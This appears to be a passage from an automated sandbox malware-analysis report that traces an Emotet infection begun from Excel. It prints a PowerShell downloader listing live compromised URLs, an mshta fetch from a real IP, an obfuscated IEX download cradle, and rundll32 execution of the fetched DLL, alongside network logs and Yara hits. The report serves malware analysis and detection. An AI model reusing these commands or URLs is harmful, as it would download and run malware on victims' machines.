                                                                                                                    Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://kuyporn.com/wp-content/XSs5/';$url2 = 'http://jeffreylubin.igclout.com/wp-admin/vzOG/';$url3 = 'http://flybustravel.com/cgi-bin/2TjUH/';$url4 = 'http://docs-construction.com/wp-admin/JJEf0kEA5/';$url5 = 'http://wallacebradley.com/css/YcDc927SJR/';$url6 = 'https://algzor.com/wp-includes/ghFXVrGLEh/';$url7 = 'https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/';$url8 = 'https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/';$url9 = 'https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/';$url10 = 'https://bluwom-milano.com/wp-content/FEj3y4z/';$url11 = 'https://thaireportchannel.com/wp-includes/KaWZp0odkEO/';$url12 = 'https://esaci-egypt.com/wp-includes/W7qXVeGp/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -
Jan 28, 2022 21:08:00.666033983 CET | 14 | IN
                                                                                                                    Data Ascii: s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',AADD;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 172.67.149.209 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:08:00.758121967 CET | 15 | OUT
GET /wp-content/XSs5/ HTTP/1.1
                                                                                                                    Host: kuyporn.com
                                                                                                                    Connection: Keep-Alive
Jan 28, 2022 21:08:00.788583994 CET | 16 | IN
HTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=196bAQ8r8ZVEf4%2FBws8sWDllYGc7kwE%2BeWUFc%2B8GsjlSfhPXLsUqDPgq%2F268jjAl%2BISm%2BkaCE3Nce9nB%2Fsjj%2FbZi0q2ruqImQHzOOXrK%2FmMw%2Fqg3p%2FntjMtQDSbsQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 6d4cd9accd886964-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                    Data Ascii: 10dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/


Session ID:3
Source IP:192.168.2.22
Source Port:49170
Destination IP:74.208.236.157
Destination Port:80
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp:Jan 28, 2022 21:08:01.508800030 CET
kBytes transferred:21
Direction:OUT
Data:
GET /wp-admin/vzOG/ HTTP/1.1
Host: jeffreylubin.igclout.com
Connection: Keep-Alive

Timestamp:Jan 28, 2022 21:08:01.720765114 CET
kBytes transferred:22
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 557056
                                                                                                                    Connection: keep-alive
                                                                                                                    Keep-Alive: timeout=15
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    Server: Apache
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    Content-Disposition: attachment; filename="v3Q.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Set-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    X-Frame-Options: SAMEORIGIN


                                                                                                                    Target ID:0
                                                                                                                    Start time:21:07:21
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13f1e0000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:2
                                                                                                                    Start time:21:07:24
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x4a330000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:4
                                                                                                                    Start time:21:07:25
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:mshta http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Imagebase:0x13ff80000
                                                                                                                    File size:13824 bytes
                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:6
                                                                                                                    Start time:21:07:29
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                    Imagebase:0x13fbe0000
                                                                                                                    File size:473600 bytes
                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:07:42
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x4a330000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:07:42
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:07:47
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:08:08
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:08:13
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:08:31
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:08:37
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:08:52
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:08:56
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
                                                                                                                    Imagebase:0x950000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:18
                                                                                                                    Start time:21:09:18
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
                                                                                                                    Imagebase:0xd80000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:19
                                                                                                                    Start time:21:09:23
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
                                                                                                                    Imagebase:0x950000
